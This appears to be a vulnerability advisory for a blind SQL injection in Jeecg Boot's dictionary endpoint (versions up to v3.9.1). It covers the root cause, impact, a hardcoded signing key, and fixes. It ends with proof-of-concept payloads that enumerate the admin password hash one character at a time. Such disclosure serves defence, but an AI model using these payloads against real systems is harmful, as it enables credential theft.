# Jeecg Boot SQL Injection Vulnerability Summary ## Vulnerability Overview * **Vulnerability ID**: #9491 * **Vulnerability Type**: SQL Injection (SQLi) * **Affected Versions**: Jeecg Boot <= v3.9.1 * **Vulnerable Endpoint**: `/sys/dict/loadDict/{dictCode}` * **Root Cause**: The backend code directly concatenates the user-supplied `keyword` parameter into the MyBatis `${filterSql}` fragment, leading to SQL injection. ## Impact Scope * **Privilege Requirement**: Low-privileged authenticated user. * **Impact**: Attackers can leverage blind SQL injection to infer sensitive non-whitelisted columns (such as `password` and `salt` in the `sys_user` table), thereby obtaining credential material. * **Defense Bypass**: The signature mechanism under default configuration is protected by a hardcoded key, allowing attackers to forge valid signatures. ## Remediation 1. **Code Level**: Replace string concatenation in dictionary search conditions with parameterized queries. 2. **Input Restriction**: Restrict dictionary search inputs to a strict whitelist of expected search characters, rejecting quotes, boolean operators, and SQL function syntax. 3. **Access Control**: Enforce server-side authorization on `/sys/dict/loadDict/*` and related dictionary endpoints, restricting access to internal users only. 4. **Key Management**: Remove the signature key from the default source code configuration and implement a securely generated key rotation mechanism. ## POC / Exploit Code **Verify predicate against default seed data:** ```sql ' and username='admin' and substring(password,1,1)='c' and username like '%' ``` **True condition (returns non-empty result):** ```sql ' and username='admin' and password like 'c%' and username like '%' ``` **False condition (returns empty result):** ```sql ' and username='admin' and password like 'x%' and username like '%' ``` **Conditional construction for enumerating password hash values:** ```sql ' and username='admin' and password like 'c%' and username like '%' ' and username='admin' and password like 'ca%' and username like '%' ' and username='admin' and password like 'cda%' and username like '%' ```